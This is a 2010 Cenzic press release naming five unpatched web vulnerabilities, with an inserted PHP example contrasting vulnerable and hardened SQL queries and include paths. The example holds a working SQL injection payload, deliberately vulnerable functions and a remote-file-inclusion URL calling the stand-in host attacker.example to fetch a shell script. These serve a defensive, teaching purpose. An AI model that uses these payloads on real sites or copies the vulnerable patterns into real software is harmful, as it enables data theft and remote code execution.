
Cenzic Releases Top Five Web Vulnerabilities For September
Web Application Security Continues To Be a Big Issue

Santa Clara, Calif. – October 21, 2010 – Cenzic Inc., the leading provider of Web application security solutions, today released the top five Web application vulnerabilities for the month of September. Cenzic Intelligent Labs (CIA) selected the top five published vulnerabilities based on criticality, availability of a public exploit, and lack of an available solution or patch.

“Although there were various critical vulnerabilities reported in Google Chrome as well as a Buffer Overflow vulnerability in Microsoft Internet Information Services (IIS) 7.5, those have been patched,” said Lars Ewe, CTO for Cenzic. “We want to give credit to those organizations who, in spite of having critical vulnerabilities, were able to provide a quick patch. Having critical vulnerabilities out in the wild with public exploits and no known solution is extremely dangerous.”

Top Vulnerabilities

  • LightNEasy LightNEasy.php Multiple Parameter SQL Injection
    LightNEasy is open to SQL injection because the 'LightNEasy.php' script does not properly sanitize user-supplied input in the 'handle' parameter and in the 'userhandle' cookie.
  • Group-Office modules/notes/json.php category_id Parameter SQL Injection
    Group-Office is open to SQL injection because the 'modules/notes/json.php' script does not properly sanitize user-supplied input in the 'category_id' parameter.
  • JE FAQ Pro Component for Joomla! index.php catid Parameter SQL Injection
    The JE FAQ Pro component for Joomla! is open to SQL injection because its 'index.php' script does not properly sanitize user-supplied input in the 'catid' parameter.
  • ibPhotohost index.php img Parameter SQL Injection
    ibPhotohost is likewise open to SQL injection because its 'index.php' script does not properly sanitize user-supplied input in the 'img' parameter.
  • Haudenschilt Family Connections CMS Remote File Inclusion Vulnerability
    Multiple PHP remote file inclusion vulnerabilities in Haudenschilt Family Connections CMS (FCMS) 2.2.3 allow remote attackers to execute arbitrary PHP code via a URL in the 'current_user_id' parameter to (1) familynews.php and (2) settings.php.
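
The two bug classes in the list above, shown as an added example that is not code from Cenzic or from any of the listed projects. It reconstructs the generic pattern the descriptions point at (a GET parameter and a cookie concatenated into a query; a request parameter used as an include path) beside a hardened form of each. The table name, column names, the in-memory SQLite database, the sample rows, the injection payload and the allowlist of profile files are all constructed for illustration and do not come from LightNEasy, FCMS or any other product named here.

```php
<?php
// Added example, not code from the listed projects. All names below are assumptions.
declare(strict_types=1);

// Constructed sample data: one public page owned by alice, one private page owned by bob.
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec("CREATE TABLE pages (handle TEXT, body TEXT, owner TEXT)");
$pdo->exec("INSERT INTO pages VALUES ('home', 'public page', 'alice'), ('secret', 'private page', 'bob')");

// (1a) Vulnerable: the 'handle' parameter and the 'userhandle' cookie are both
// attacker-controlled, yet both are spliced straight into the SQL string.
// In a real handler they would arrive as $_GET['handle'] and $_COOKIE['userhandle'].
function lookup_vulnerable(PDO $pdo, string $handle, string $userhandle): array
{
    $sql = "SELECT body FROM pages WHERE handle = '$handle' AND owner = '$userhandle'";
    return $pdo->query($sql)->fetchAll(PDO::FETCH_COLUMN);
}

// (1b) Hardened: a prepared statement sends the values separately from the query
// text, so a quote inside the input can never change the statement's structure.
function lookup_hardened(PDO $pdo, string $handle, string $userhandle): array
{
    $stmt = $pdo->prepare("SELECT body FROM pages WHERE handle = :handle AND owner = :owner");
    $stmt->execute([':handle' => $handle, ':owner' => $userhandle]);
    return $stmt->fetchAll(PDO::FETCH_COLUMN);
}

// Constructed payload: closes the string literal and appends an always-true clause.
// Because AND binds tighter than OR, the vulnerable query becomes
//   handle = 'secret' OR ('1'='1' AND owner = 'alice')
// and returns bob's private page alongside alice's own row.
$payload = "secret' OR '1'='1";
var_dump(lookup_vulnerable($pdo, $payload, 'alice')); // ["private page", "public page"]: injection succeeded
var_dump(lookup_hardened($pdo, $payload, 'alice'));   // []: the payload is matched as a literal handle

// (2a) Vulnerable: a request parameter is used as an include path. With
// allow_url_include=On, ?current_user_id=http://attacker.example/shell.txt%3F makes
// PHP fetch and execute remote code; with it off, the same line still permits
// local file inclusion. Not invoked here for that reason.
function load_profile_vulnerable(string $current_user_id): void
{
    include $current_user_id . '/profile.php';
}

// (2b) Hardened: the untrusted value only selects from a fixed map of local files,
// so no attacker-supplied string ever reaches include(). The caller includes the
// returned path; anything outside the map is rejected outright.
function load_profile_hardened(string $current_user_id): string
{
    $allowed = [
        '1' => __DIR__ . '/profiles/1.php', // assumed local files
        '2' => __DIR__ . '/profiles/2.php',
    ];
    if (!array_key_exists($current_user_id, $allowed)) {
        throw new InvalidArgumentException('unknown user id');
    }
    return $allowed[$current_user_id];
}

var_dump(load_profile_hardened('1'));                          // ".../profiles/1.php"
try {
    load_profile_hardened('http://attacker.example/shell.txt?');
} catch (InvalidArgumentException $e) {
    echo "rejected: {$e->getMessage()}\n";                      // rejected: unknown user id
}
```

The point of the two hardened variants is the same: the untrusted value is never allowed to become syntax, neither SQL syntax via a prepared statement's bound parameters, nor a filesystem or URL path via an allowlist lookup. Escaping or "sanitizing" the string in place, which is what the advisories above say the affected scripts fail to do, is the weaker fix; keeping data and code separate is the one that survives the next encoding trick.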

About Cenzic

Cenzic, a trusted provider of software and SaaS security products, helps organizations secure their websites against hacker attacks. Cenzic focuses on Web Application Security, automating the process of identifying security defects at the Web application level where more than 75 percent of hacker attacks occur. Our dynamic, black box Web application testing is built on a non-signature-based technology that finds more “real” vulnerabilities as well as provides vulnerability management, risk management, and compliance for regulations and industry standards such as PCI. Cenzic solutions help secure the websites of numerous Fortune 1000 companies, all major security companies, leading government agencies and universities, and hundreds of SMB companies -- overall helping to secure trillions of dollars of e-commerce transactions. The Cenzic solution suite fits the needs of companies across all industries, from a cloud solution (Cenzic ClickToSecure Cloud™), to testing remotely via our managed service (Cenzic ClickToSecure® Managed), to a full enterprise software product (Cenzic Hailstorm® Enterprise ARC™) for managing security risks across the entire company.

Network Products Guide